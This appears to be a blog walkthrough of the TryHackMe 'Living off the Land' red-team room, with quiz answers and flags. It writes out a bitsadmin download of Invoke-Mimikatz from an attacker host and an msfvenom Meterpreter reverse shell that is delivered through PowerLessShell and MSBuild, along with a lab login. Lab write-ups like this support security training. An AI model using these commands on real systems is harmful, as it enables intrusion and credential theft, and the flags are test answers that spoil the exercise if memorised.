Living off the Land THM Walkthrough

Rich
3 min readMay 2, 2023

--

TL;DR Walkthrough of the TryHackMe Living off the Land room, part of the Red Team Pathway.

A full list of our TryHackMe walkthroughs and cheatsheets is here.

Background

Living off the Land is one of the rooms in the THM Red Team Pathway that piqued my interest, so I figured I’d post my notes on it. I’m also a big fan of using builtin tools.

Warmup questions

Visit the LOLBAS project’s website and check out its functionalities. Then, using the search bar, find the ATT&CK ID: T1040. What is the binary’s name?

Pktmon.exe

Use the search bar to find more information about MSbuild.exe. What is the ATT&CK ID?

T1127.001

Use the search bar to find more information about Scriptrunner.exe. What is the function of the binary?

Execute

BITSAdmin

Run bitsadmin.exe to download a file of your choice onto the attached Windows VM. Once you have executed the command successfully, an encoded flag file will be created automatically on the Desktop. What is the file name?

#Host files on Kali
cd /home/kali/Downloads/exploits/PowerShell
python3 -m http.server 9000

#Download the file on the Windows victim VM
bitsadmin.exe /transfer /Download /priority Foreground http://10.6.36.88:9000/Invoke-Mimikatz.ps1 c:\Users\thm\Desktop\Invoke-Mimikatz.ps1

enc_thm_0YmFiOG_file.txt

What is the file content?

Set-Location C:\Users\thm\Desktop
certutil -decode .\enc_thm_0YmFiOG_file.txt .\payload.txt
Get-Content .\payload.txt

THM{ea4e2b9f362320d098635d4bab8a568e}

PowerShell reverse shell without PowerShell.exe

Replicate the steps of the No PowerShell technique to receive a reverse shell on port 4444. Once a connection is established, a flag will be created automatically on the desktop. What is the content of the flag file?

#Generate an obfuscated PS1 reverse shell
cd /home/kali/Downloads/exploits/PowerShell
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=10.6.36.88 LPORT=4443 -f psh-reflection > liv0ff.ps1

#Download PowerLessShell & convert the PS1 to csproj
git clone https://github.com/Mr-Un1k0d3r/PowerLessShell.git
find / -name "PowerLessShell.py" 2>/dev/null

cd /home/kali/Downloads/exploits/PowerShell/PowerLessShell
python2 /home/kali/Downloads/exploits/PowerShell/PowerLessShell/PowerLessShell.py -type powershell -source ../liv0ff.ps1 -output liv0ff.csproj

You will want to run PowerLessShell.py from the specified directory, otherwise you will likely get an odd error that looks like the below.

Open two new BASH tabs. In one:

cd /home/kali/Downloads/exploits/PowerShell/PowerLessShell
python3 -m http.server 9000

In the other tab:

msfconsole -q -x “use exploit/multi/handler; set payload windows/meterpreter/reverse_winhttps; set lhost 10.6.36.88;set lport 4443;exploit”

In the original tab:

xfreerdp /v:10.10.248.89 /u:thm /p:TryHackM3

#On the victim Windows VM

Invoke-WebRequest http://10.6.36.88:9000/liv0ff.csproj -OutFile C:\Users\thm\Desktop\livOff.csproj

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe c:\Users\thm\Desktop\liv0ff.csproj

Catch the reverse shell in Meterpreter and read the file.

THM{23005dc4369a0eef728aa39ff8cc3be2}

Summary

We demonstrated just a couple of the ways out there to run PowerShell without PowerShell.exe here.

We say it all the time; “focus on the privilege, not the tool”. The attacker will just find a different TTP if you spend all your time blocking specific tools. Don’t let the attacker get privileges and it won’t matter what tool they use.

Cybersecurity is ultimately all about Identity and Access Management.

References

How to find files in BASH: https://www.cyberciti.biz/faq/search-for-files-in-bash/

Suppress errors while searching in BASH: https://linuxhint.com/two-dev-null-command-purpose/

PowerShellLess on GitHub: https://github.com/Mr-Un1k0d3r/PowerLessShell

--

--

Rich
Rich

Written by Rich

I work various IT jobs & like Windows domain security as a hobby. Most of what’s here is my notes from auditing or the lab.

No responses yet